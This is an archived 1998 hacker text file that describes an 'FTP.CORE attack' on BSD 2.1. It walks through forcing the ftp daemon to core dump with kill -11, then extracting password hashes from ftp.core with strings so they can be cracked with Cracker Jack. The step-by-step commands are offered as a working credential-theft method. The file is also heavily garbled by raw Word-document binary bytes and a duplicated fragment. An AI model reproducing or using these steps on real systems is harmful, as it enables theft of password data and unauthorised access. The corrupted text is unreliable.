The Hacker's Encyclopedia 1998

home *** CD-ROM | disk | FTP | other *** search

/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / unix / ftpcore.txt < prev next >

Wrap

Text File | 2003-06-11 | 9.0 KB | 29 lines

╨╧αí▒ ß>■ ■ ² ■ ■ ■ ■ Root Entry └F@pqwtσ║ÇWordDocument CompObj ^ ■ ∙ç£░╤τ°jkmno¥¼╩∩ 167[\∙≤φτß█╒╧╔─┐║╡░½ªí£ùÆìêâ≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡\`éº─Γπ / 0 4 5 \ ] v z ▒ ╦ ╓ ╫ i j ·⌡≡δµß▄╫╥═╚├╛╣┤»¬Ñá¢ûæîç≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡j ε ∩ ⁿ ² ■ ·⌡≡δµ≡≡≡≡≡∙■ ∙■ /K @± Normala "A@≥ í"Default Paragraph Font╨ @■ └FMicrosoft Word 6.0 Document MSWordDoc⌠9▓qo and should be able to pick it clean of all passwords and other information you might be interested in.This has only been tested, and worked on BSD 2.1 so far, if it works on other systems, feel free to modify this text to reflect it.Bronc Buster▄Ñe#└ ∙■ ,l,l ¬O(∞ÿTεO MS Sans SerifSymbolTimes New RomanTimes New RomanFTP.CORE attack for BSD 2.1-----------------------------------------------------------------------------------------------------------------by The Bronc Buster bbuster@succeed.nethttp://www2.succeed.net/~bbusterMade for The Infectedwww.infected.com-----------------------------------------------------------------------------------------------------------------This is a relativly simple attack, and can be done as ANY LEGIT user on a BSD 2.1 system. The focus of this attack is to get the ftp daemond to produce a core dump. When it dumps, all the information it has used up to the point it dumps will be stored in a file, in the the directory you are in, called "ftp.core". This file will contain shell and enviornment varibles, paths, and other misc stuff. What we will be looking for is the unshadowed passwd file. As this process has to access the passwd file to make sure you're legit, it stores all the information proir to your user in a buffer, and it will have to unshadow , or access the shadowed file, to do this. After you get the encrypted passwords, go find a copy of Cracker Jack and get to work. Ok, how to do it:#ftp foobar.comWelcom to foobar.com ftp siteblah blah blahplease enter login name> evilthat user requires a password> evil2 User evil loged in welcome to foobar.com!Remote set to type BINftp>(now hit ^Z to suspend the process)#ps PID TT STAT TIME COMMAND 9526 p0 Ss 0:00.12 -csh (csh) 9539 p0 R+ 0:00.02 ps1000 p0 Ss 0:00.22 ftp(get the PID number to the ftp process)#kill -11 1000(kill the process)#fg(bring the ftp back to the foreground)Process Killed Core Dump#lshome mail public_html ftp.core#strings ftp.core > test#pico testFrom this point you have the .core in pico and should be able to pick it clean of all passwords and other information you might be interested in.This has only been tested, and worked on BSD 2.1 so far, if it works on other systems, feel free to modify this text to reflect it.Bronc Buster∙åç¢£»░╨╤µτ≈°ijklmno~£¥½¼╔╩ε∩ 01567Z[\_`üéªº├─ßΓπ ²√∙≈⌡≤±∩φδΘτσπß▀▌█┘╫╒╙╤╧═╦╔╟┼├┴┐╜╗╣╖╡│▒»¡½⌐ºÑúíƒ¥¢ÖùòôæÅ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]8 . / 0 3 4 5 [ \ ] u v y z ░ ▒ ╩ ╦ ╒ ╓ ╫ h i j φ ε ∩ √ ⁿ ² ■ ²√∙≈⌡≤±∩φδΘτσπß▀▌█┘╫╒╙╤╧═╦╔╟┼├┴┐]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]